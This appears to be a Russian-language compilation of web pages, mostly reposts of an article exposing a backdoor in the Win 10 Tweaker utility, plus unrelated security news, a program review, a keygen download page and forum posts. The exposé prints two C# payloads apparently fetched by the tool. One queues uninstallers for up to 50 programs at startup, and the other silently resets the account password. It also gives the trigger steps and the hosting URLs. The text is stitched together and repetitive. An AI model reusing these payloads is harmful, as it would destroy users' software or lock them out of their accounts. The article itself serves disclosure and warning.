Перепечатка статьи с Хабра (вернее с ее копии), которая была удалена, где освещалась проблема того, что Win 10 Tweaker с осени 2020 года был, оказывается, интегрирован самый обычный бэкдор с возможностью исполнения зловредного кода, выполняющегося от имени администратора. Ресурс с которого скачивался зловредный код в открытом виде располагался на https://win10tweaker.com/PrivilegeUser.php?key=Universal . Но автор уже закрыл доступ к нему и с выходом версии 17.3 beta «согласился» якобы удалить функционал бэкдора.
Но интернет всё помнит
• Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
• Выяснилось, что, чтобы вызвать скачивание удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net , а внутри — просто пустой файл System.Deps.dll;
• Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
• Хватит лишь открытия раздела «Системная информация», где можно получить сведения о характеристиках ПК;
• Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.
Пикабу не позволяет вставлять код в статью, поэтому ссылку на зловредный код разместил на pastebin:
Разберем по-быстрому код.
• Берется путь профиля и присобачивается к нему «\\AppData\\Local\\ Turbo.net «;
• Если имеется папка Turbo.net , то по маске *.* рекурсивно ищется файл System.Deps.dll;
• Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляете в Windows любую программу, если ее деинсталлятор прописывается в системе.
• Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Сохраненная ссылка на Wayback Machine, если «чудотворным» образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal .
Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.
Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
Автор сам признал, что у программы была незадокументированная возможность, Соглашение, принимаемое перед использованием программы, позволяет ему делать, что угодно.
Автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.
Видео с одним из вариантов, как удалить ключ.
Уже после опубликования статьи другой пользователь доказал на видео, что, получи злоумышленники доступ к ресурсу, где размещался зловредный код, и можно было осуществить перенаправление трафика уже на их ресурс с другим зловредным кодом
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
Разработчик трояна считает, что всё сделал правильно, мы все убоги и, оказывается, завидуем его успеху, а этот «инцидент» — жирный намек.
Kaspersky уже детектит версию 17.2 как бэкдор.
Хауди Хо, который когда-то рекламировал Win 10 Tweaker уже скрыл своё видео, написав пост в группе в Telegram. После выпустил ролик с призывом не пользоваться этим трояном, но после угроз от Хачатура (автора трояна) скрыл кусок уже опубликованного ролика.
Стас «Ай, как просто» тоже выпустил ролик, где извиняется перед аудиторией, что когда-то тоже рекламировал этот троян (с привязкой ко времени). Но Хачатур уже готовит иск к нему.
И напоследок мякотка: обсуждение на форуме трояна ролика Стаса Ай, как просто: https://win10tweaker.pro/forum/topic/опять-клевета
На его форуме вообще тоталитарная секта. И особенно доставляет, как автор Win 10 Tweaker пишет «я» и «мне» в середине предложения с большой буквы. xD
И дебилы такие на форумах «Винда 10 вся дырявая и полная телеметрии, кровавый Билли будет следить за нами!», ставят кучу всякого говна и твикеров. с бэкдорами
А в чем драма?
Автор проги какой-то видный уважаемый чел или что?
Что с того, что он там угрожает кому-то?
Почему просто нельзя его нахуй послать?
Сам этой прогой никогда не пользовался и не знал даже о ней
Вообще в недоумении, что новость такие бурления вызывает — мне кажется очевидным, что такому софту веры нет, а тут прям срывы покровов
Такой софт напичкан подобным говном как пирожок ливером жи
Хорошая оптимизация системы. -50 программ и винда будет летать =)
В Windows 10 добавят две новые системы для борьбы с читерами
Компания Microsoft анонсировала две новые античит-системы, которые будут добавлены в Windows 10 с осенним обновлением Creators Update. Называться они будут TruePlay и Game Monitor.
Первая разработана эксклюзивно для игр компаний и будет работать на базе UWP, платформы приложений для Windows 10. Game Monitor будет работать со всеми играми, собирая информацию о системе пользователя и отправляя ее в Microsoft. Предположительно, обе системы будут отслеживать запуск запрещенных программ, проверять эту информацию, и только потом блокировать нечестных пользователей.
Отмечается, что личная информация игроков пострадать не должна: системы якобы будут собирать ее только при активации запрещенных программ. Тем не менее, по мнению некоторых пользователей, это еще одна попытка компании устроить тотальную слежку.
Специалисты «Доктор Веб» рассказали, как мошенники зарабатывают на «договорных матчах»
Обычно создатели таких ресурсов выдают себя за отставных тренеров или спортивных аналитиков. Но на самом деле никакой инсайдерской информации у мошенников, конечно, нет. Просто часть пользователей получает один спортивный прогноз, а другая часть — прямо противоположный. Если кто-то из пострадавших заподозрит обман и возмутится, ему предложат получить следующий прогноз бесплатно в качестве компенсации за проигрыш.
Казалось бы, причем здесь хакерство и современные технологии? Однако им действительно нашлось применение и здесь. Мошенники по-прежнему создают сайты «договорных матчей» (или действуют в социальных сетях), но теперь в качестве подтверждения качества своих услуг они предлагают пользователям заранее скачать защищенный паролем самораспаковывающийся RAR-архив. Якобы он содержит текстовый файл с результатами грядущего матча. Пароль от архива злоумышленники высылают лишь после завершения состязания. Предполагается, что таким образом пользователь сможет сравнить предсказанный результат с реальным и убедиться, что все было честно.
Специалисты отмечают, что существует и альтернативный вариант данной схемы: злоумышленники отправляют жертве защищенный паролем файл Microsoft Excel, содержащий специальный макрос. Этот макрос аналогичным образом подставляет в таблицу требуемый результат в зависимости от введенного пароля.
Исследователи напоминают, что не стоит доверять сайтам, предлагающим разбогатеть благодаря ставкам на тотализаторе с использованием инсайдерской информации, даже если обещания мошенников выглядят правдоподобно и убедительно.
Глава компании SEC Consult взломал мошенников, прислав им вредоносный PDF
В начале августа 2016 года французский исследователь Иван Квиатковски проучил мошенников, выдававших себя за специалистов технической поддержки. Дело в том, что скаммеры атаковали родителей специалиста, с чем он мириться не пожелал и хитростью вынудил мошенника установить шифровальщика Locky на свой компьютер. О похожем поступке недавно рассказал и глава сингапурского подразделения компании SEC Consult, Флориан Лукавски (Florian Lukavsky). Он сумел скомпрометировать мошенников более крупного калибра и передал все собранные о них данные в руки правоохранительных органов.
О содеянном Лукавски рассказал журналистам издания The Register на конференции Hack in the Box, прошедшей в Сигнапуре, в августе 2016 года. Эксперту удалось разоблачить так называемых скаммеров-китобоев (или whaling-скаммеров). Основной бизнес таких парней заключается в организации хитроумных афер с применением социальной инженерии. Мошенники рассылают сотрудникам крупных, прибыльных предприятий письма, которые замаскированы под послания от начальства или от руководителей фирм-партнеров. В письмах поддельный босс просит сотрудников срочно перевести деньги на какой-либо банковский счет, который на самом деле принадлежит злоумышленникам.
Данная схема работает очень эффективно. Так, по данным ФБР, за семь месяцев было зафиксировано более 14 000 случаев whaling-мошенничества, а компании суммарно лишились более чем 2,2 млрд долларов. Среди пострадавших, были такие всемирно известные компании, как Mattel, потерявшая 3 млн долларов, Ubiquiti, лишившаяся 46,7 млн долларов, и бельгийский банк Crelan, чьи потери составили 78 млн долларов. При этом вернуть средства удается очень редко. К примеру, компания Ubiquiti сумела вернуть лишь 9 млн долларов из похищенных 46,7 млн.
Лукавски применил к мошенникам их же методы. Эксперт сумел скомпрометировать Microsoft-аккаунты злоумышленников.
Парольные хеши Windows 10 не продержались долго, и вскоре исследователь предоставил полиции данные, которые позже привели к аресту ряда лиц в Африке.
Также эксперт признался журналистам, что ему очень понравилась недавняя история Ивана Квиатковски. Лукавски рассказал, что один из его друзей тоже недавно «поймал» whaling-скаммера и передал в руки правоохранительных органов и банков информацию сразу о семи различных счетах, принадлежавших злоумышленникам. Эксперт уверен, что такие аккаунты являются едва ли не самым ценным активом мошенников, так как в наши дни банки вводят все более жесткие механизмы регламентации и регулирования и уделяют больше внимания схемам, направленным против отмывания денег.
Бэкдор в Win 10 Tweaker, или современные методы борьбы с пиратством
Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из который в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой «сюрприз» спрятал внутри его создатель.
Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php? key=Universal.
Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker.
- Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
- Выяснилось, что, чтобы вызвать скачивания удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
- Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
- Хватит лишь открытия раздела «Системная информация», где можно получить сведения о характеристиках ПК;
- Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.
Разберем по-быстрому код.
- Берется путь профиля и присобачивается к нему »\\AppData\\Local\\Turbo.net»;
- Если имеется папка Turbo.net, то помаске *.* рекурсивно ищется файл System.Deps.dll;
- Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляет в Windows любую программу, если ее деинсталлятор прописывается в системе.
- Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Сохраненная ссылка на Wayback Machine, если «чудотворным» образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php? key=Universal.
Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.
Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.
Видео с одним из вариантов, как удалить ключ.
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
Уже после опубликования статьи другой пользователь доказал на видео, что, получи злоумышленники доступ к ресурсу, где размещался зловредный код, и можно было осуществить перенаправление трафика уже на их ресурс с другим зловредным кодом
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам
Разработчик трояна считает, что всё сделал правильно, мы все убоги и, оказывается, завидуем его успеху, а этот «инцидент» — жирный намек.
Kaspersky уже детектит версию 17.2 как бэкдор.
Хауди Хо, который когда-то рекламировал Win 10 Tweaker уже скрыл своё видео, написав пост в группе в Telegram. После выпустил ролик с призывом не пользоваться этим трояном, но после угроз от Хачатура (автора трояна) скрыл кусок уже опубликованного ролика.
Стас «Ай, как просто» тоже выпустил ролик, где извиняется перед аудиторией, что когда-то тоже рекламировал этот троян. Но Хачатур уже готовит иск к нему.
И напоследок мякотка: обсуждение на форуме трояна ролика Стаса Ай, как просто: https://win10tweaker.pro/forum/topic/опять-клевета
На его форуме вообще тоталитарная секта. И особенно доставляет, как автор Win 10 Tweaker пишет «я» и «мне» в середине предложения с большой буквы. xD
Win 10 Tweaker 20.0 Portable by XpucT [Multi/Ru]
• Программа не пускает пыль в глаза , демонстрируя бесполезные возможности. В Win 10 Tweaker собраны только самые востребованные параметры и опции. Многие параметры включают в себя десятки других, чтобы сэкономить время на выборе галочек, и, опять же, не пускать пыль в глаза пользователю.
• Каждый пункт-твик имеет подробное описание-подсказку при наведении мыши на него.
• Win 10 Tweaker избавлен от дополнительных модулей типа nircmd, самораспаковывающихся архивов SFX и библиотек, в которых нуждаются другие твикеры. В программе заложено всё, что нужно для применения настроек на лету. Если пользователю что-то не нужно, система не будет загажена ни единым байтом.
• Win 10 Tweaker не просто откатывает действия , если Вы пользуетесь отдельной иконкой перед чекбоксом, а восстанавливает именно системные значения. Это может быть полезно тем, кто не знает, как вернуть то, что поломал другой твикер.
• Программа была написана изначально для Windows 10 , потому и называется Win 10 Tweaker, но спустя несколько версий она обзавелась полноценной совместимостью с Windows 7, 8.1, Server.
• Win 10 Tweaker не просто поддерживает обе разрядности (x86 и x64), но и сочетает их обе в одном экземпляре программы. И в зависимости от разрядности и версии Windows сам выбирает метод работы с системой.
• Win 10 Tweaker имеет самую быструю и удобную систему выпиливания и восстановления приложений из магазина Windows. Поддержку удаления и восстановления имеют абсолютно все приложения. По удобству, внешнему виду, интуитивности и скорости у Win 10 Tweaker в этом плане нет аналогов.
• Программа имеет самую быструю и удобную систему обновления . Достаточно проверить обновления в окне «О программе» и нажать OK, чтобы программа мгновенно обновилась и запустилась снова.
Сжатие программных файлов
Сжатие только операционной системы
Сжатие только хранилища WinSXS
Очистка системы от устаревших драйверов / дубликатов драйверов
Поиск и замена дубликатов файлов с возможностью удаления дубликатов
• Нейросетевая очистка мусора
Win 10 Tweaker – первая программа, в которой реализована очистка
системного диска и программ на основе искусственного интеллекта.
Достаточно включить это в настройках и не думать о том, что программы или
Windows сорят в системе. Нейросеть сама всё найдёт.
• Очистка оперативной памяти
Win 10 Tweaker уже не просто завершает ненужные процессы,
а очищает саму оперативную память, выгружая неиспользуемый
кэш, библиотеки и дочерние процессы, в которых уже не нуждается ОС.
• Экспорт и Импорт настроек
Вы можете с лёгкостью сохранить состояние системы,
чтобы в будущем воспользоваться импортов всех ранее
сделанных твиков и настроек, включая состояние служб.
Также доступен тихий ключ -import, позволяющий импортировать
настройки и твики без лишних телодвижений и подтверждений
• Экспорт и Импорт драйверов
Благодаря экспорту драйверов Вы можете сохранить
драйвера без лишнего мусора в виде дополнительного ПО
от создателя.
Также, в экспорт не пролезут драйвера от Microsoft и прочее
сомнительное ПО. Лишь то, что действительно — драйвер.
К драйверам также будет добавлен удобный список
установленных программ на Вашем компьютере в
удобном и автономном файле htm с датой сохранения.
• Экспорт и Импорт расширений
Авторский алгоритм экспорта настроек расширений Windows.
Win 10 Tweaker экспортирует все настройки расширений в файл,
который после переустановки Windows можно менее чем за 1 сек
импортировать. Таким образом все иконки всех файлов будут
автоматически применены, как это было на вашей прошлой Windows.
Все пути к программам, которые должны открывать ваши mp3, mp4, jpg и т.д.
будут автоматически помнить кто и чем должен открываться и как должен выглядеть.
(подробнее)
Win 10 Tweaker ежедневно обучается исправлению многих
багов, которые не торопится исправлять Microsoft и другие
разработчики. Для «лечения» Windows ничего делать не нужно,
достаточно просто запустить Win 10 Tweaker.
В список автоматических фиксов входит:
• Восстановление папки Автозагрузка при её нарушении
• Восстановление папки ресурсов кэша системы при её нарушении
• Восстановление файла hosts (файл правил и редиректов по сети)
В список рекомендаций входят:
• Ускорение запуска Windows за счёт отложенного запуска некоторых служб
• Отключение зарезервированного хранилища, занимающего более 7 ГБ
• Отключение сжатия качества обоев
• Полное вырезание Защитника Windows из системы
(если искусственный интеллект под капотом понимает, что это захочет пользователь)
И многое многое другое. Подробнее.
• Наблюдение за актуальностью пользовательских API
Когда Win 10 Tweaker обнаруживает недостающие компоненты
.NET Framework, DirectX, Visual C++, то сообщает об этом,
предлагая скачать и установить, если это рекомендуется.
• Проверка файлов на вирусы
Win 10 Tweaker позволяет проверять файлы на вирусы,
не посещая сайт VirusTotal, а делая всё это в одном окне.
По завершению проверки, Вы сможете сохранить отчёт-скриншот
о результатах сканирования, а также загрузить его на хостинг
изображений с автоматическим помещением ссылки в буфер обмена.
Полный список ключей :
widget – запускает виджет очистки оперативной памяти
tray – запускает очистку оперативной памяти в трей
import – тихий импорт твиков
clean – запускает пользовательскую очистку
kill – очищает оперативную память
rexplorer – перезапускает Проводник, очищая при этом его кэш
AntiSpyRulesUpdater – обновляет антишпионские правила
drvexport – экспорт драйверов
extexport – экспорт расширений
Путь:\к файлу\файл – проверяет на вирусы
(пример: «D:\Программы\Win 10 Tweaker.exe» «C:\Users\Admin\Desktop\File.rar» )
Путь:\к папке\папка – устанавливает драйвера в тихом режиме
(пример: «D:\Программы\Win 10 Tweaker.exe» «C:\Users\Admin\Desktop\Drivers» )
] – выполнить Очистку и закрыть Win 10 Tweaker
[Esc] – закрыть программу / любые окна в Win 10 Tweaker
[F2] или [Ctrl+Alt] (удерживать) – запустить Superform
[Ctrl+E] – перезапустить Проводник (explorer), очистив одновременно кэш иконок и эскизов
[Alt+S] – откатить все службы
[Alt+R] – откатить все твики
[P] – закрепить / открепить Win 10 Tweaker поверх всех окон
[B] – режим для слепых
[I] – сохранить на Рабочий стол информацию о Windows (программы и службы)
[Ctrl+S] – сохранить полный лог очистки (находясь в панели Очистки)
Win 10 Tweaker Pro 19.4 + Keygen
Рад поделиться с Вами очень хорошей утилитой для оптимизации операционной системы Windows 10.
Win 10 Tweaker Pro предоставляет возможность улучшить и ускорить работу ОС, прирост в производительности вы почувствуете сразу же. В личной практике очень часто использую данный софт на свежеустановленных системах, чтобы у пользователей было меньше проблем в их работе.
Конечно, можно пользоваться и бесплатной версией программы, но у нее немного порезан функционал. Здесь же опубликую полную Pro версию Win 10 Tweaker, а также подробную инструкцию по ее активации. Но для начала разберемся, что это вообще за зверь такой и что он может.
Возможности Win 10 Tweaker Pro
Раздел «Конфиденциальность»
Конфиденциальность
Контекстное меню
контекстное меню виндовс
Интерфейс
Система
Службы
Службы windows 10
Очистка
Очистка Windows 10
Приложения
Приложения
Автозагрузка
Автозагрузка
Оптимизация
оптимизация системы
Системная информация
системная информация
Как пользоваться программой
активация твика
Если нужно вернуть настройку на круги своя, то нажимаем на эту стрелочку:
Для неподготовленных юзеров, которые сталкиваются с Windows, настройки ОС иногда становятся настоящим темным лесом. Эту достаточно узкую нишу охватывают разработчики всевозможных твикеров, один из который в своих подходах к защите своей программы пошел самым радикальным способом. Сегодня мы немножко препарируем один самых известных таких продуктов — Win 10 Tweaker и посмотрим, какой «сюрприз» спрятал внутри его создатель.
Решил оформить небольшой материал с доказательствами того, как с недавних пор (примерно с осени 2020 года) в Win 10 Tweaker в целях борьбы со взломом программы был интегрирован самый обычный бэкдор, в особых обстоятельствах получающий зловредный код с ресурса https://win10tweaker.com/PrivilegeUser.php?key=Universal.
Не будем обсуждать личность автора и его отношение к пользователям, а также то, что он творит на своем форуме, а поговорим о том, что нам поведал сниффер трафика Win 10 Tweaker, у которого на момент написания статьи, судя по счётчику на сайте, больше 1 400 000 скачиваний.
-
Скачиваем с сайта последнюю версию программы. Сейчас скачивается версия 17.2, SHA-256: 06DB5801D37895C75B7D60FA5971827DA80CC275D9E78E5986A120C003021A0D;
-
Выяснилось, что, чтобы вызвать скачивания удаленного кода, надо просто создать в %LOCALAPPDATA% папку Turbo.net, а внутри — просто пустой файл System.Deps.dll;
-
Запускаем Win 10 Tweaker и принимаем правой кнопкой соглашение;
-
Хватит лишь открытия раздела «Системная информация», где можно получить сведения о характеристиках ПК;
-
Сразу с ресурса, указанного выше, через бэкдор в открытом виде скачивается и исполняется код, написанный на C#, который прописывает в реестре в раздел автозагрузки для всех пользователей ключи на удаление первых 50 установленных программ. При первом выходе/входе из учетной записи или перезагрузке эти программы запустят свои деинсталляторы.
using System;
using System.Collections.Generic;
using Microsoft.Win32;
using System.IO;
namespace N {
class C {
public void M() {
string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
if (Directory.Exists(path)) {
string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
foreach(string file in files) {
if (file.Contains("System.Deps.dll")) {
List list = new List();
using(RegistryKey key = Registry.LocalMachine.OpenSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Uninstall")) {
foreach(string k in key.GetSubKeyNames()) {
if (key.OpenSubKey(k).GetValue("UninstallString") != null) {
list.Add(key.OpenSubKey(k).GetValue("UninstallString").ToString());
}
}
}
for (int i = 0; i < 50; i++) {
RegistryKey key = Registry.LocalMachine.CreateSubKey("SOFTWARE\\Microsoft\\Windows\\CurrentVersion\\Run");
key.SetValue(i.ToString(), list[i]);
}
}
}
}
}
}
}
Разберем по-быстрому код.
-
Берется путь профиля и присобачивается к нему «\\AppData\\Local\\Turbo.net»;
-
Если имеется папка Turbo.net, то по маске *.* рекурсивно ищется файл System.Deps.dll;
-
Если такой на вашу беду находится, то получаем значения ключей UninstallString в разделе HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall. В этом параметре хранится команда для деинсталляции программ. Собственно, именно эта команда запускается, когда вы удаляет в Windows любую программу, если ее деинсталлятор прописывается в системе.
-
Сохраняем полученные строки и записываем первые 50 команд на удаление в автозагрузку для всех пользователей. Отныне при первой перезагрузке запустят свои деинсталляторы те программы, у которых есть свойство UninstallString.
Сохраненная ссылка на Wayback Machine, если «чудотворным» образом ресурс будет недоступен. Кстати, тот же зловредный код расположен и на домене https://win10tweaker.ru/PrivilegeUser.php?key=Universal.
Скажите спасибо, что не в тихом режиме все удаляется, и окошки с уведомлением об удалении будут видны в любом случае.
Осенью же на этом ресурсе располагался другой код, устанавливающий пароль на учетную запись. Пароль, как нетрудно догадаться, глядя на код, был Rock5taR. То есть ресурс один, а зловредный код иногда да и меняется.
using System;
using System.Diagnostics;
using System.IO;
namespace N
{
class C
{
public void M()
{
string path = Environment.GetFolderPath(Environment.SpecialFolder.UserProfile) + "\\AppData\\Local\\Turbo.net";
if (Directory.Exists(path))
{
string[] files = Directory.GetFiles(path, "*.*", SearchOption.AllDirectories);
foreach (string file in files)
{
if (file.Contains("System.Deps.dll"))
{
Process.Start(new ProcessStartInfo
{
FileName = "cmd",
Arguments = "/c net user " + "\"" + Environment.UserName + "\"" + " Rock5taR",
WindowStyle = ProcessWindowStyle.Hidden
});
}
}
}
}
}
}
Также автор заявляет о портативности программы, что на самом деле не так: чего только стоит создание неудаляемого ключа в реестре по пути HKCU\Software\Win 10 Tweaker, так как программа меняет права доступа на этот раздел.
Видео с одним из вариантов, как удалить ключ.
Остается тайной, зачем автор в борьбе с пиратами, беря за программу в том числе и плату, интегрировал туда самый обычный бэкдор. И кто знает, что еще она в себе таит… Выводы, как всегда, делать только вам.
Win 10 Tweaker — программа для настройки и оптимизации Windows 10, популярная среди русскоязычных пользователей и, нужно признать, очень функциональная. Однако, если вы спросите о том, могу ли я смело рекомендовать её начинающему пользователю, отвечу: скорее нет, чем да, более безопасными будут Winaero Tweaker или Ultimate Windows Tweaker. Кроме этого появились основания предполагать, что Win 10 Tweaker — не то, что следует рекомендовать вообще кому-либо.
В этом обзоре — о функциях Win 10 Tweaker, некоторых особенностях работы, где скачать программу и (многие интересуются) о том, как принять лицензионное соглашение. Также может быть интересным: Лучшие программы для очистки диска компьютера Windows 10 — Windows 7.
- Использование Win 10 Tweaker и предупреждения
- Видео инструкция
- Как принять лицензионное соглашение Win 10 Tweaker и где скачать программу
Использование Win 10 Tweaker для настройки и оптимизации системы
Внимание: есть основания предполагать, что программа нежелательная и может совершать вредоносные действия. Более не рекомендую программу к использованию. Безопасные альтернативы указаны в первом абзаце статьи.
Прежде чем приступить, начну с первой порции предупреждений об оптимизации Windows 10 в рассматриваемой программы:
- Если вы из тех пользователей, которые действуют по принципу: отметить все доступные пункты чтобы «максимально оптимизировать» Windows 10 и применить их — Win 10 Tweaker не для вас. Впрочем, ни одна из аналогичных программ не предполагают такого сценария использования.
- Перед применением программы настоятельно рекомендую вручную создать точку восстановления системы (а лучше и вовсе резервную копию Windows 10).
- Автор Win 10 Tweaker отдельно предупреждает о том, что предполагает, что утилита будет запущена в чистой Windows 10, а не в какой-либо сборке или иным образом модифицированной системе — в этом случае вероятность того, что что-то пойдет не так возрастает.
- А вообще, с учетом новой информации — лучше не использовать эту программу.
Также учитывайте, что ваш антивирус может заблокировать запуск Win 10 Tweaker или сообщить о том, что это потенциально нежелательное ПО, такой же отчет вы увидите и в VirusTotal. Как я написал в предупреждении выше, в данном случае не исключено, что, это действительно так.
После запуска программы и принятия лицензионного соглашения вы увидите интерфейс, типичный для твикеров — возможности, отсортированные по категориям, в каждой из которых можно выбрать нужные параметры оптимизации и применить их кнопкой слева внизу. В Win 10 Tweaker при наведении указателя мыши на заголовки настроек в панели слева отображается описание этого пункта, для некоторых разделов описание дается для всего раздела целиком.
Теперь о том, что и в каких разделах Win 10 Tweaker вы можете найти:
- Конфиденциальность — параметры для отключения различных функций телеметрии (слежки) Windows 10.
- Контекстное меню — добавление полезных и удаление ненужных пунктов контекстного меню Windows 10. В этом контексте также может быть полезным: Как редактировать контекстное меню Windows 10 в EasyContextMenu.
- Интерфейс — варианты оптимизации внешнего вида Windows 10.
- Система — изменение некоторых опций системы, отключение компонентов Windows 10 (например, возможность отключить Защитник Windows 10, включить старый просмотр фотографий, удалить OneDrive).
- Службы — отключение «ненужных» служб Windows 10 и служб, отвечающих за обновления, некоторые возможности телеметрии. Состояние (включена-отключена) служб изменяется путем нажатия по её названию.
- Очистка — удаление временных и других ненужных файлов, кэша браузеров и игр, кэша установщиков и других элементов. Тут может быть интересным: Очистка системы от ненужных файлов в бесплатной программе Privazer.
- Приложения — удаление (с возможность восстановления) встроенных приложений Windows 10. В этом контексте полезным может быть материал: Лучшие бесплатные деинсталляторы (программы для удаления программ).
- Автозагрузка — программы и другие объекты в автозагрузке с возможностью их отключения и включения. На эту тему: Как удалить и добавить программы в автозагрузку Windows 10.
- Оптимизация — опции сжатия ОС и системных файлов, хранилища WinSxS, очистки от устаревших драйверов, возможность удаления дубликатов файлов с диска.
- Проверка на вирусы — возможность проверки файлов в интерфейсе Win 10 Tweaker через API VirusTotal.
- Системная информация — базовые сведения об операционной системе и оборудовании компьютера.
Отдельно рекомендую зайти в настройки программы (значок шестеренки в заголовке окна): там вы найдете некоторые дополнительные опции очистки, возможности создания точки восстановления системы, экспорта драйверов (только в Pro версии) и некоторые другие.
Здесь же присутствует опция для отката всех изменений, сделанных с помощью Win 10 Tweaker. Однако по возможности рекомендую для отмены изменений использовать системные точки восстановления, так как действие в программе откатывает не только то, что было сделано в ней, но и некоторые другие вещи (параметры переключения клавиатуры, системные значки на рабочем столе и другие).
Переходим к заключительной порции предупреждений об использовании Win 10 Tweaker:
- Если вы не знаете ничего о какой-то опции, не торопитесь применять её только исходя из описания в программе: поищите в Интернете, что это. Например, из описания опции «Остановить и отключить UAC», можно предположить, что это отличная идея (не совсем), сжатие всех системных и программных файлов или сжатие операционной системы для обычного компьютера с обычным объемом SSD/HDD не нужно, некоторые опции раздела «Интерфейс» очень субъективны, очистка некоторых элементов кэша не полезна (кроме случаев нарушения работы, например, эскизов в проводнике).
- После применения настроек в Win 10 Tweaker, а также в любой другой программе для оптимизации Windows 10 или отключения слежки всегда помните о том, что вы это когда-то делали. Если по прошествии какого-то времени вы столкнетесь с тем, что какие-то компоненты системы отказываются работать, программы, «завязанные» на серверы Майкрософт, сообщают об ошибках, нужная служба не запускается, ссылаясь на зависимые службы (Не удалось запустить дочернюю службу или группу), не исключено, что причина в проделанной когда-то оптимизации.
Видео инструкция
Далее — видео, где программа Win 10 Tweaker показано наглядно, равно как и озвучены некоторые соображения о её использовании.
Как принять лицензионное соглашение Win 10 Tweaker и где скачать программу
Отвечаю на вопрос, как на часто задаваемый пользователями. Самый верный метод принять лицензионное соглашение Win 10 Tweaker — внимательно прочитать его, там четко говорится о том, что делать.
Если это оказалось сложным, то принятие соглашения выполняется нажатием правой кнопкой мыши по кнопке «Принять».
Скачать Win 10 Tweaker вы можете бесплатно с официального сайта https://win10tweaker.pro/ — большинство функций доступно и без приобретения Pro лицензии.
0 / 0 / 0 Регистрация: 18.08.2021 Сообщений: 4 |
|
1 |
|
21.10.2021, 00:03. Показов 5135. Ответов 6
при открытие твикера вылазит окно с текстом: и примерно дней 2-3 назад не было проблем с открытием данного софта, а теперь откуда не возьмись есть такая проблема.
0 |
Форумчанин 5955 / 4190 / 405 Регистрация: 28.12.2013 Сообщений: 24,134 |
|
21.10.2021, 00:05 |
2 |
отключи дефендер. А лучше не пользуйся твикером, ничего этот хлам не дает
1 |
0 / 0 / 0 Регистрация: 18.08.2021 Сообщений: 4 |
|
21.10.2021, 00:11 [ТС] |
3 |
дефендер отключил когда ставил винду так что не в нём проблема
0 |
595 / 445 / 69 Регистрация: 29.04.2019 Сообщений: 2,160 |
|
21.10.2021, 03:58 |
4 |
дефендер отключил когда ставил винду так он через время опять включается. но, вы написали, не в нём проблема, нечего и говорить
0 |
